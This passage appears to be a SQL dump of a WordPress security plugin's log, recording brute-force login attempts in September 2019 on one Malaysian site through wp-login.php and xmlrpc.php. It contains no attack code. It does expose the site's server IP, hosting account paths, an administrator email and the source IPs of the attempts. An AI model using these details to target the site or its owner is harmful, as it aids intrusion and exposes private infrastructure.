16:54:52',17741416,19231320,'https://bintara.com.my/wp-login.php',1,0,'146.185.183.107'),(24193,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"146.185.183.107\";s:11:\"REMOTE_PORT\";s:5:\"55456\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@@Xx0uvyt9KRYoKL80TQAAAAc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568652895.3961\";s:12:\"REQUEST_TIME\";s:10:\"1568652895\";}}','notice','2019-09-16 16:54:56','2019-09-16 16:54:55',18260128,19557192,'https://bintara.com.my/xmlrpc.php',1,0,'146.185.183.107'),(24194,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"209.15.37.34\";s:11:\"REMOTE_PORT\";s:5:\"42128\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@-nx0uvyt9KRYoKL80@AAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568653215.6347\";s:12:\"REQUEST_TIME\";s:10:\"1568653215\";}}','notice','2019-09-16 17:00:16','2019-09-16 17:00:15',17741720,19232112,'https://bintara.com.my/wp-login.php',1,0,'209.15.37.34'),(24195,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"32976\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-CjKS12C5jHDQNOzQavgAAAVI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568653966.2516\";s:12:\"REQUEST_TIME\";s:10:\"1568653966\";}}','notice','2019-09-16 17:12:47','2019-09-16 17:12:46',17742960,19231248,'https://bintara.com.my/wp-login.php',1,0,'162.144.134.39'),(24196,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"167.99.47.59\";s:11:\"REMOTE_PORT\";s:5:\"51970\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-EU6S12C5jHDQNOzQbngAAAUg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568654421.9642\";s:12:\"REQUEST_TIME\";s:10:\"1568654421\";}}','notice','2019-09-16 17:20:23','2019-09-16 17:20:22',17741976,19232776,'https://bintara.com.my/wp-login.php',1,0,'167.99.47.59'),(24197,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"167.99.47.59\";s:11:\"REMOTE_PORT\";s:5:\"53662\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-EXuqEC9Lh-FlYaMzEdwAAAJQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568654430.502\";s:12:\"REQUEST_TIME\";s:10:\"1568654430\";}}','notice','2019-09-16 17:20:31','2019-09-16 17:20:30',18259776,19556112,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.47.59'),(24198,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.228.226\";s:11:\"REMOTE_PORT\";s:5:\"60332\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-FVSaSQcUTKDhMcCWRuQAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568654677.1419\";s:12:\"REQUEST_TIME\";s:10:\"1568654677\";}}','notice','2019-09-16 17:24:38','2019-09-16 17:24:37',17740768,19232432,'https://bintara.com.my/wp-login.php',1,0,'139.59.228.226'),(24199,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.171.46\";s:11:\"REMOTE_PORT\";s:5:\"26895\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-F3aS12C5jHDQNOzQcZwAAAUQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568654813.7579\";s:12:\"REQUEST_TIME\";s:10:\"1568654813\";}}','notice','2019-09-16 17:26:55','2019-09-16 17:26:54',17743192,19234528,'https://bintara.com.my/wp-login.php',1,0,'139.59.171.46'),(24200,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.171.46\";s:11:\"REMOTE_PORT\";s:5:\"27350\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-F4OqEC9Lh-FlYaMzEyQAAAI8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568654816.9386\";s:12:\"REQUEST_TIME\";s:10:\"1568654816\";}}','notice','2019-09-16 17:27:00','2019-09-16 17:26:57',18260464,19557712,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.171.46'),(24201,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"216.10.243.118\";s:11:\"REMOTE_PORT\";s:5:\"53252\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-IhmShanGhHYaqyCSgMwAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568655494.6929\";s:12:\"REQUEST_TIME\";s:10:\"1568655494\";}}','notice','2019-09-16 17:38:19','2019-09-16 